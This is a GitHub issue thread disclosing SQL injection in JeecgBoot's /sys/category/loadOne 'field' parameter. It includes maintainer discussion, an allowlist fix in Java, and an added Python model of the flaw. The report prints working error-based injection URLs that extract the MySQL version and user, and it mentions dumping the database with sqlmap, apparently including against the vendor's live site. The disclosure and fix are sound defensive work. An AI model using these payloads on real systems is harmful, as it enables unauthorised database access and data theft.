
jeecg-boot/jeecg-boot/sys/category/loadOne interface field parameters have SQL injection #3663

Description

@Garck3h
Version:

<=3.2

Problem description:

After testing, I found that the jeecg-boot/jeecg-boot/sys/category/loadOne interface's field parameter has SQL injection.

SQL injection exists in an interface that queries the data of the classification dictionary. After downloading the https://github.com/jeecgboot/jeecg-boot project source code and starting it, capturing the request and modifying it allows SQL injection to be performed; the use of sqlmap for SQL injection is also illustrated.

The data received by the interface is consistent with the data in the classification dictionary, but it is not the production interface of the classification dictionary. See the following two figures:
image
image

Screenshots & code:

Payload (view MySQL version): /jeecg-boot/sys/category/loadOne?_t=1651480890&field=extractvalue(1,concat(char(126),(version()),md5(1678381038)))&val=f39a06bf9f390ba4a53d11bc4e0018d7

image

Payload (view the current user name and host name of MySQL): /jeecg-boot/sys/category/loadOne?_t=1651480890&field=extractvalue(1,concat(char(126),(user()),md5(1678381038)))&val=f39a06bf9f390ba4a53d11bc4e0018d7

image

Results injected using sqlmap:
image

Getting the database:
image

Here is the risk code:
image

Friendly reminder (to improve issue handling efficiency):

  • Posts that do not follow the format requirements will be deleted directly;
  • Please judge for yourself whether the problem description is clear and convenient for us to investigate and handle;
  • For the problem, please state whether it is the Online function (specify the theme template used) or the generated code function;
  • Descriptions that are too simple or vague to be handled will be deleted directly;

Activity

zhangdaiscott

zhangdaiscott commented on May 4, 2022

@zhangdaiscott
Member

Logged, ty

tygithub1

tygithub1 commented on May 6, 2022

@tygithub1

In the menu "classified dictionary", there is no interface such as you described to be called; if you want to test this interface /sys/category/loadOne, please pass a plain string instead of an expression.

Garck3h

Garck3h commented on May 6, 2022

@Garck3h
Author

In the menu "classification dictionary", there is no interface such as you described to be called; if you want to test this interface /sys/category/loadOne, please pass a plain string instead of an expression.

Oh, sorry. It may not be in the "classification dictionary" menu bar, but it does exist; it can query the "classification dictionary" data, and by changing the value of "field" it can be attacked, as shown in the normal request result:
image

Garck3h

Garck3h commented on May 6, 2022

@Garck3h
Author

In the menu "classified dictionary", there is no interface such as you described to be called; if you want to test this interface /sys/category/loadOne, please pass a plain string instead of an expression.

Hello, I have confirmed that the interface exists. When you perform the following steps, you will find the request packet. Common Cases --> Custom Components --> Tree Dictionary:
image
image

tygithub1

tygithub1 commented on May 6, 2022

@tygithub1

I got it, you can try like this:

    @RequestMapping(value = "/loadOne", method = RequestMethod.GET)
    public Result<SysCategory> loadOne(@RequestParam(name="field") String field, @RequestParam(name="val") String val) {
        Result<SysCategory> result = new Result<SysCategory>();
        try {
            // check whether the field is a property of the entity
            boolean isClassField = SqlInjectionUtil.isClassField(field, SysCategory.class);
            if (!isClassField) {
                return Result.error("字段无效,请检查!");
            }

            QueryWrapper<SysCategory> query = new QueryWrapper<SysCategory>();
            query.eq(field, val);
            List<SysCategory> ls = this.sysCategoryService.list(query);
            // ignore many code

    /**
     * Determine whether the given field is a property of the class
     * @param field
     * @param clazz
     * @return
     */
    public static boolean isClassField(String field, Class clazz){
        Field[] fields = clazz.getDeclaredFields();
        for(int i=0;i<fields.length;i++){
            if(fields[i].getName().equalsIgnoreCase(field)){
                return true;
            }
        }
        return false;
    }
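
The root cause described in the report, and the allowlist fix proposed above, as an added Python model that is not part of the issue or of the JeecgBoot code base: the `SysCategory` columns, the sqlite table and the `sys_category` table name are constructed stand-ins, and `is_class_field` mirrors the case-insensitive property check of `SqlInjectionUtil.isClassField`. It shows why `query.eq(field, val)` is dangerous (the column name is spliced into the SQL text while only the value is bound) and that the allowlist rejects the report's `extractvalue(...)` field value.

```python
import sqlite3
from dataclasses import dataclass, fields

# Constructed stand-in for the SysCategory entity; the real project's
# columns are not assumed here.
@dataclass
class SysCategory:
    id: str = ""
    pid: str = ""
    name: str = ""
    code: str = ""

def is_class_field(field: str, entity=SysCategory) -> bool:
    """Mirror of SqlInjectionUtil.isClassField: accept only a name that is a
    declared property of the entity, compared case-insensitively."""
    return any(f.name.lower() == field.lower() for f in fields(entity))

def build_query_unsafe(field: str, val: str):
    # Pre-fix shape of query.eq(field, val): the column name goes into the
    # SQL text verbatim; only the value is bound as a parameter.
    return f"SELECT * FROM sys_category WHERE {field} = ?", (val,)

def build_query_safe(field: str, val: str):
    # Post-fix shape: the name must pass the allowlist before it reaches SQL.
    if not is_class_field(field):
        raise ValueError("invalid field")
    return f'SELECT * FROM sys_category WHERE "{field}" = ?', (val,)

def load_one(conn: sqlite3.Connection, field: str, val: str) -> list:
    sql, params = build_query_safe(field, val)
    return conn.execute(sql, params).fetchall()

def make_demo_db() -> sqlite3.Connection:
    # Constructed in-memory table with two sample rows.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE sys_category (id TEXT, pid TEXT, name TEXT, code TEXT)")
    conn.executemany("INSERT INTO sys_category VALUES (?, ?, ?, ?)",
                     [("1", "0", "root", "A01"), ("2", "1", "child", "A01A01")])
    return conn

# The "field" value from the report's first payload.
PAYLOAD = "extractvalue(1,concat(char(126),(version()),md5(1678381038)))"

if __name__ == "__main__":
    conn = make_demo_db()
    print(build_query_unsafe(PAYLOAD, "x")[0])   # payload lands inside the SQL text
    print(load_one(conn, "CODE", "A01"))          # allowlisted, case-insensitive
    try:
        load_one(conn, PAYLOAD, "x")
    except ValueError as e:
        print("rejected:", e)
```

Note that, like the Java check built on `getDeclaredFields()`, this allowlist is the entity's declared properties rather than the table's real columns, so any non-column property of the entity still reaches the query as an identifier.
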
Garck3h

Garck3h commented on May 7, 2022

@Garck3h
Author

I got it, you can try like this:

    @RequestMapping(value = "/loadOne", method = RequestMethod.GET)
    public Result<SysCategory> loadOne(@RequestParam(name="field") String field, @RequestParam(name="val") String val) {
        Result<SysCategory> result = new Result<SysCategory>();
        try {
            // check whether the field is a property of the entity
            boolean isClassField = SqlInjectionUtil.isClassField(field, SysCategory.class);
            if (!isClassField) {
                return Result.error("字段无效,请检查!");
            }

            QueryWrapper<SysCategory> query = new QueryWrapper<SysCategory>();
            query.eq(field, val);
            List<SysCategory> ls = this.sysCategoryService.list(query);
            // ignore many code

    /**
     * Determine whether the given field is a property of the class
     * @param field
     * @param clazz
     * @return
     */
    public static boolean isClassField(String field, Class clazz){
        Field[] fields = clazz.getDeclaredFields();
        for(int i=0;i<fields.length;i++){
            if(fields[i].getName().equalsIgnoreCase(field)){
                return true;
            }
        }
        return false;
    }

image
When I give it some malicious statements, I can query the version of the database, the database name and other information, and even pull down the whole database's data, so it is very dangerous. Sorry for a bit of offense to the official website in doing the above verification.

zhangdaiscott

zhangdaiscott commented on May 7, 2022

@zhangdaiscott
Member

Handled.

chuxl2017

chuxl2017 commented on Jul 27, 2022

@chuxl2017

@zhangdaiscott May I ask which commit this corresponds to?
